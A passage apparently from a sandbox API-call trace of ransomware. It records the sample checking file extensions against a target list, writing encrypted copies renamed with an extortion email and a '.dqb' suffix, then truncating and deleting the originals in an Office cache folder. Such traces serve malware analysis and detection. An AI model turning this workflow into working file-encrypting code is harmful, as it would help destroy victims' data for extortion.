returned 72 [0034.733] lstrlenW (lpString=".1cd") returned 4 [0034.733] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.733] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.733] lstrlenW (lpString=".jpg") returned 4 [0034.733] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.733] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.733] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.733] lstrlenW (lpString=".doc") returned 4 [0034.734] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.734] lstrlenW (lpString=".docx") returned 5 [0034.734] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.734] lstrlenW (lpString=".pdf") returned 4 [0034.734] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.734] lstrlenW (lpString=".xls") returned 4 [0034.734] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.734] lstrlenW (lpString=".xlsx") returned 5 [0034.734] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.734] lstrlenW (lpString=".ppt") returned 4 [0034.734] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.734] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.734] lstrlenW (lpString=".zip") returned 4 [0034.734] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.734] lstrlenW (lpString=".rar") returned 4 [0034.734] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.734] lstrlenW (lpString=".bz2") returned 4 [0034.734] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.734] lstrlenW (lpString=".7z") returned 3 [0034.734] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.734] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.734] lstrlenW (lpString=".dbf") returned 4 [0034.734] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.734] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.734] lstrlenW (lpString=".1cd") returned 4 [0034.734] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.734] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.734] lstrlenW (lpString=".jpg") returned 4 [0034.734] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.734] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0034.734] lstrlenW (lpString="Setup.xml") returned 9 [0034.734] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0034.736] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=6241) returned 1 [0034.736] CloseHandle (hObject=0x1a4) returned 1 [0034.736] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0034.736] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0034.736] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0034.736] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.736] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.736] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0034.739] GetLastError () returned 0x0 [0034.739] ReadFile (in: hFile=0x1a4, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x1861, lpOverlapped=0x0) returned 1 [0034.741] WriteFile (in: hFile=0x1a0, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x1870, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x1870, lpOverlapped=0x0) returned 1 [0034.742] ReadFile (in: hFile=0x1a4, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0034.742] WriteFile (in: hFile=0x1a0, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0034.742] SetEndOfFile (hFile=0x1a0) returned 1 [0034.742] CloseHandle (hObject=0x1a0) returned 1 [0034.743] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.743] SetEndOfFile (hFile=0x1a4) returned 1 [0034.744] CloseHandle (hObject=0x1a4) returned 1 [0034.744] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0034.744] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0034.744] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.744] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.744] lstrlenW (lpString=".doc") returned 4 [0034.744] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.744] lstrlenW (lpString=".docx") returned 5 [0034.744] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.744] lstrlenW (lpString=".pdf") returned 4 [0034.745] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.745] lstrlenW (lpString=".xls") returned 4 [0034.745] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.745] lstrlenW (lpString=".xlsx") returned 5 [0034.745] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.745] lstrlenW (lpString=".ppt") returned 4 [0034.745] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.745] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.745] lstrlenW (lpString=".zip") returned 4 [0034.745] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.745] lstrlenW (lpString=".rar") returned 4 [0034.745] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.745] lstrlenW (lpString=".bz2") returned 4 [0034.745] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.745] lstrlenW (lpString=".7z") returned 3 [0034.745] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.745] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.745] lstrlenW (lpString=".dbf") returned 4 [0034.745] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.745] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.745] lstrlenW (lpString=".1cd") returned 4 [0034.745] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.745] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.745] lstrlenW (lpString=".jpg") returned 4 [0034.745] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.745] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.745] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.745] lstrlenW (lpString=".doc") returned 4 [0034.745] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.745] lstrlenW (lpString=".docx") returned 5 [0034.745] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.745] lstrlenW (lpString=".pdf") returned 4 [0034.745] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.745] lstrlenW (lpString=".xls") returned 4 [0034.746] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.746] lstrlenW (lpString=".xlsx") returned 5 [0034.746] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.746] lstrlenW (lpString=".ppt") returned 4 [0034.746] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.746] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.746] lstrlenW (lpString=".zip") returned 4 [0034.746] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.746] lstrlenW (lpString=".rar") returned 4 [0034.746] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.746] lstrlenW (lpString=".bz2") returned 4 [0034.746] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.746] lstrlenW (lpString=".7z") returned 3 [0034.746] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.746] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.746] lstrlenW (lpString=".dbf") returned 4 [0034.746] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.746] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.746] lstrlenW (lpString=".1cd") returned 4 [0034.746] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.746] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.746] lstrlenW (lpString=".jpg") returned 4 [0034.746] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.746] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0034.746] lstrlenW (lpString="VisioMUI.xml") returned 12 [0034.746] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0034.747] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=9503) returned 1 [0034.747] CloseHandle (hObject=0x1a4) returned 1 [0034.747] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml")) returned 0x2020 [0034.747] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0034.747] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0034.747] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.747] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.747] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0034.747] GetLastError () returned 0x0 [0034.747] ReadFile (in: hFile=0x1a4, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x251f, lpOverlapped=0x0) returned 1 [0034.749] WriteFile (in: hFile=0x1a0, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x2520, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x2520, lpOverlapped=0x0) returned 1 [0034.750] ReadFile (in: hFile=0x1a4, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0034.750] WriteFile (in: hFile=0x1a0, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0034.750] SetEndOfFile (hFile=0x1a0) returned 1 [0034.750] CloseHandle (hObject=0x1a0) returned 1 [0034.751] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.751] SetEndOfFile (hFile=0x1a4) returned 1 [0034.752] CloseHandle (hObject=0x1a4) returned 1 [0034.752] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0034.752] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml")) returned 1 [0034.752] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0034.752] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0034.752] lstrlenW (lpString=".doc") returned 4 [0034.752] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.752] lstrlenW (lpString=".docx") returned 5 [0034.752] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.752] lstrlenW (lpString=".pdf") returned 4 [0034.752] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.752] lstrlenW (lpString=".xls") returned 4 [0034.752] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.752] lstrlenW (lpString=".xlsx") returned 5 [0034.752] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.752] lstrlenW (lpString=".ppt") returned 4 [0034.752] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.752] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0034.752] lstrlenW (lpString=".zip") returned 4 [0034.752] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.753] lstrlenW (lpString=".rar") returned 4 [0034.753] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.753] lstrlenW (lpString=".bz2") returned 4 [0034.753] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.753] lstrlenW (lpString=".7z") returned 3 [0034.753] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.753] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0034.753] lstrlenW (lpString=".dbf") returned 4 [0034.753] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.753] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0034.753] lstrlenW (lpString=".1cd") returned 4 [0034.753] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.753] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0034.753] lstrlenW (lpString=".jpg") returned 4 [0034.753] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.753] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0034.753] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0034.753] lstrlenW (lpString=".doc") returned 4 [0034.753] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.753] lstrlenW (lpString=".docx") returned 5 [0034.753] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.753] lstrlenW (lpString=".pdf") returned 4 [0034.753] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.753] lstrlenW (lpString=".xls") returned 4 [0034.753] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.753] lstrlenW (lpString=".xlsx") returned 5 [0034.753] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.753] lstrlenW (lpString=".ppt") returned 4 [0034.753] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.753] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0034.753] lstrlenW (lpString=".zip") returned 4 [0034.753] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.753] lstrlenW (lpString=".rar") returned 4 [0034.753] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.754] lstrlenW (lpString=".bz2") returned 4 [0034.754] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.754] lstrlenW (lpString=".7z") returned 3 [0034.754] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.754] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0034.754] lstrlenW (lpString=".dbf") returned 4 [0034.754] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.754] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0034.754] lstrlenW (lpString=".1cd") returned 4 [0034.754] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.754] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0034.754] lstrlenW (lpString=".jpg") returned 4 [0034.754] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.754] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0034.754] lstrlenW (lpString="OneNoteMUI.xml") returned 14 [0034.754] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0034.755] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=1606) returned 1 [0034.755] CloseHandle (hObject=0x1a4) returned 1 [0034.755] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml")) returned 0x2020 [0034.755] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0034.755] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0034.755] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.755] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.755] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0034.756] GetLastError () returned 0x0 [0034.756] ReadFile (in: hFile=0x1a4, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x646, lpOverlapped=0x0) returned 1 [0034.757] WriteFile (in: hFile=0x1a0, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x650, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x650, lpOverlapped=0x0) returned 1 [0034.758] ReadFile (in: hFile=0x1a4, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0034.758] WriteFile (in: hFile=0x1a0, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0034.758] SetEndOfFile (hFile=0x1a0) returned 1 [0034.758] CloseHandle (hObject=0x1a0) returned 1 [0034.759] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.759] SetEndOfFile (hFile=0x1a4) returned 1 [0034.759] CloseHandle (hObject=0x1a4) returned 1 [0034.760] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0034.760] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml")) returned 1 [0034.760] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0034.760] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0034.760] lstrlenW (lpString=".doc") returned 4 [0034.760] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.760] lstrlenW (lpString=".docx") returned 5 [0034.760] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.760] lstrlenW (lpString=".pdf") returned 4 [0034.760] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.760] lstrlenW (lpString=".xls") returned 4 [0034.760] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.760] lstrlenW (lpString=".xlsx") returned 5 [0034.760] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.760] lstrlenW (lpString=".ppt") returned 4 [0034.760] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.760] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0034.760] lstrlenW (lpString=".zip") returned 4 [0034.760] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.760] lstrlenW (lpString=".rar") returned 4 [0034.761] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.761] lstrlenW (lpString=".bz2") returned 4 [0034.761] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.761] lstrlenW (lpString=".7z") returned 3 [0034.761] lstrcmpiW (lpString1=".7z", 